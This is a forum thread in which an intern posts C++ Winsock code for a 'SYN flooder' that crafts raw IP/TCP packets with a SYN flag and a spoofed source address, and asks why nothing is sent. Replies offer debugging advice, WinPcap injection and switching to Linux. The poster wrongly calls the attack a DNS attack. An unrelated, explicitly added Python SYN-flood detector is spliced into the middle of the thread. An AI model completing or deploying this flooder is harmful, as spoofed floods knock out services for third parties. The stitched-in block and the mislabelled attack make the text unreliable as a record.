luke2

Raw Sockets


Hello all,

Recently, I've started interning with a security firm (this is meant more to teach me than much else). My first project was to make a 'syn flooder' (A DNS attack)... So I did some research and came up with two options:

A: Send out TCP packets with false IP addresses and a SYN flag set
B: Modify the NIDS code (basically 'root kit level patching')

I went with A, so therefore I need Raw Sockets. Some more research revealed that "Raw TCP packets can't contain data". Not a problem, I think, since all I need is a header with a SYN flag and a fake IP address. (Btw, I found that semi-quote from a source on Wikipedia.)

So I test my app with Ethereal, but nothing is sent out, at all! And my error checking doesn't reveal anything... So, I am doing this in C++ w/ Visual Studio 2005 Standard, winsock2, on Vista. I have access to a virtual machine too. Also, I make sure that I'm running/debugging with administrator permissions.

*Disclaimer* I am not trying to hack anyone or anything, but merely to learn about security-wise programming *Disclaimer*

Here is some of my code. I think my error might be in my flag setting routine; I've only set the SYN flag.
namespace SynAttacker
{
	char packetData[512]; //Max size of packet is 512 bytes
	int payloadSize = 256; 
	IPV4_HDR* ipHdr=NULL; 
	TCP_HDR* tcpHdr=NULL;
	SOCKADDR_IN dest; 
	hostent* hostEntity=NULL; 
	unsigned short src_port;
	unsigned short dest_port;
	char* src_ip;
	char* dest_ip;
}

void SynAttacker::setUpAddresses( unsigned short src_port, unsigned short dest_port, char* src_ip, char* dest_ip )
{
	if( (hostEntity=gethostbyname(dest_ip))==0 )
		printf( "Host unresolved" );
	dest.sin_family = AF_INET;
	dest.sin_port = htons( dest_port );
	memcpy( &dest.sin_addr.s_addr, hostEntity->h_addr, hostEntity->h_length );
	SynAttacker::src_port = src_port;
	SynAttacker::src_ip = src_ip;
	SynAttacker::dest_port = dest_port;
	SynAttacker::dest_ip = dest_ip;
}

SOCKET SynAttacker::generateAndSendPacket( SOCKET s )
{	
	/**
	A packet has TWO headers, first comes the IP portion, 
	then comes the TCP packet- since TCP is built 'on top of' 
	IP.  So I set up the IP data first, then I set up the TCP.
	*/ 

	ipHdr = (IPV4_HDR *)packetData;	//lets point to the ip header portion
	ipHdr->ip_version=4;		//The version of the IP that this packet is formed for
	ipHdr->ip_header_len=5;		//The length of the IP header, in 32 bit words (4 bytes)
	ipHdr->ip_tos    = 0;
	ipHdr->ip_total_length = htons ( sizeof(IPV4_HDR) + sizeof(TCP_HDR) );
	ipHdr->ip_id     = htons(2);
	ipHdr->ip_frag_offset = 0;
	ipHdr->ip_frag_offset1 = 0;
	ipHdr->ip_reserved_zero = 0;
	ipHdr->ip_dont_fragment = 1;
	ipHdr->ip_more_fragment = 0;
	ipHdr->ip_ttl    = 8;
	ipHdr->ip_protocol = IPPROTO_TCP;
	ipHdr->ip_srcaddr  = inet_addr(src_ip);
	ipHdr->ip_destaddr = inet_addr(inet_ntoa(dest.sin_addr));
	ipHdr->ip_checksum = 0;

	tcpHdr = (TCP_HDR *)&packetData[sizeof(IPV4_HDR)]; //get the pointer to the tcp header in the packet
	
	tcpHdr->source_port = htons(src_port);
	tcpHdr->dest_port = htons(dest_port);
	//FLAGS- Might this be the mistake?
	tcpHdr->cwr=0;
	tcpHdr->ecn=0;
	tcpHdr->urg=0;
	tcpHdr->ack=0;
	tcpHdr->psh=0;
	tcpHdr->rst=0;
	tcpHdr->syn=1;
	tcpHdr->fin=0;
	tcpHdr->ns=0;
	
	tcpHdr->checksum = 0;
    
	//Take the address where the packet's data starts.
	//void* dataPtr = &packetData[sizeof(IPV4_HDR) + sizeof(TCP_HDR)];
	//memset(dataPtr, '^', payloadSize);

	
	
	printf( "Bytes sent: %d", sendto( s, packetData, sizeof(IPV4_HDR)+sizeof(TCP_HDR) + payloadSize, 0, (SOCKADDR*)&dest, sizeof(dest) ) );
		
	return s;
}

You don't show the bit of code that creates the socket.

Try out something like this example first:
http://tangentsoft.net/wskfaq/examples/rawping.html

If that doesn't work, my gut feeling would be that Vista has mucked things up. Make sure you're running the program as the real Administrator.

But for serious security analysis, I wouldn't rely on such operating system APIs. I believe WinPcap allows packet injection, somewhere in the NDIS IM level.

Quote:
I think my error might be in my flag setting routine, I've only set the SYN flag.

No, that's perfectly valid. IIRC, the standard TCP handshake is SYN, SYN|ACK, ACK.

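The handshake the reply describes (SYN, SYN|ACK, ACK) is also what a defender watches for when looking for the flood the original post is building: a flooded listener accumulates half-open connections, from many distinct (often spoofed) sources, that never receive the final ACK. The following is an added example and not code from this thread; the traffic records are constructed and the thresholds are assumed.

```python
# Added example, not from the thread: replay simplified TCP flag records
# through a three-way-handshake tracker (SYN, SYN|ACK, ACK) and flag a
# listener holding many half-open connections from many distinct sources.
from collections import defaultdict

HALF_OPEN_LIMIT = 5      # assumed threshold; tune for the real environment
MIN_DISTINCT_SRC = 4     # spoofed floods arrive from many distinct sources

# Constructed sample traffic in a simplified "src:port > dst:port FLAGS" form
# (S = SYN, A = ACK, R = RST); this is not real capture output.
SAMPLE = [
    "10.0.0.5:40000 > 192.0.2.10:80 S",
    "192.0.2.10:80 > 10.0.0.5:40000 SA",
    "10.0.0.5:40000 > 192.0.2.10:80 A",        # legitimate handshake completes
    "198.51.100.1:1025 > 192.0.2.10:80 S",
    "198.51.100.2:1025 > 192.0.2.10:80 S",
    "198.51.100.3:1025 > 192.0.2.10:80 S",
    "198.51.100.4:1025 > 192.0.2.10:80 S",
    "198.51.100.5:1025 > 192.0.2.10:80 S",     # five SYNs that are never ACKed
]

def parse(line):
    """Split 'src_ip:sport > dst_ip:dport FLAGS' into (src, dst, flags)."""
    src, _, dst, flags = line.split()
    sip, sport = src.rsplit(":", 1)
    dip, dport = dst.rsplit(":", 1)
    return (sip, int(sport)), (dip, int(dport)), set(flags)

def track_handshakes(lines):
    """Return {listener: set of peers whose handshake never completed}."""
    half_open = defaultdict(set)
    for line in lines:
        src, dst, flags = parse(line)
        if "S" in flags and "A" not in flags:
            half_open[dst].add(src)             # bare SYN opens a half-open slot
        elif "A" in flags and "S" not in flags:
            half_open[dst].discard(src)         # final ACK completes the handshake
        elif "R" in flags:
            half_open[dst].discard(src)         # RST from the client tears it down
    return half_open

def detect_syn_flood(lines):
    """Return the listeners (ip, port) that look flooded."""
    alerts = []
    for listener, peers in track_handshakes(lines).items():
        if len(peers) >= HALF_OPEN_LIMIT and len({ip for ip, _ in peers}) >= MIN_DISTINCT_SRC:
            alerts.append(listener)
    return alerts
```

Real captures carry sequence numbers and timeouts; a production tracker would also expire stale half-open entries and only count SYNs that the listener actually answered with SYN|ACK.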
Well, I've compared my code to multiple versions on the internet, and they appear to be the same---


bool SynAttacker::initializeAttack()
{
	WSADATA wsaData;
	WORD version;
	int error;

	version = MAKEWORD( 2, 0 );

	error = WSAStartup( version, &wsaData );

	/* check for error */
	if ( error != 0 )
	{
		/* error occurred */
		return FALSE;
	}

	/* check for correct version */
	if ( LOBYTE( wsaData.wVersion ) != 2 ||
	     HIBYTE( wsaData.wVersion ) != 0 )
	{
		/* incorrect WinSock version */
		WSACleanup();
		return FALSE;
	}

	return TRUE;
}


//Creates a socket
SOCKET SynAttacker::getSocket( )
{
	SOCKET s;
	//Create Raw TCP Socket
	printf("\nCreating Raw TCP Socket...");
	if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW))==SOCKET_ERROR)
	{
		printf("Creation of raw socket failed.");
		return 0;
	}
	printf("Raw TCP Socket Created successfully.");
	////////////////////////////////////////////////
	int optval=1;
	//Put Socket in RAW Mode.
	printf("\nSetting the socket in RAW mode...");
	if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&optval, sizeof(optval))==SOCKET_ERROR)
	{
		printf("failed to set socket in raw mode.");
		return 0;
	}
	printf("Successful.");
	return s;
}

Yes, I run VS2005 as admin, although I doubt that this transfers over to programs running under its control, so I just compile and then navigate to the exe file w/ Windows Explorer and start it up with administrator rights.

In Vista, there's a rather important difference between "administrator rights" and the actual Administrator account. Try running it as Administrator.

But then again...if that's the problem, I'd expect error codes.

Hmmm... That seems interesting, but I have an empty partition (40gigs) on my hd so I was thinking of installing xp w/o any service packs-- do you think that would remove security restrictions?

While it would remove security restrictions, it would also leave the (virtual) machine vulnerable to outside attack, as WinXP was really hole-y when released. A better approach might be to install a modern Linux flavor, which doesn't have the holes, and doesn't try to prevent you from sending raw TCP packets.
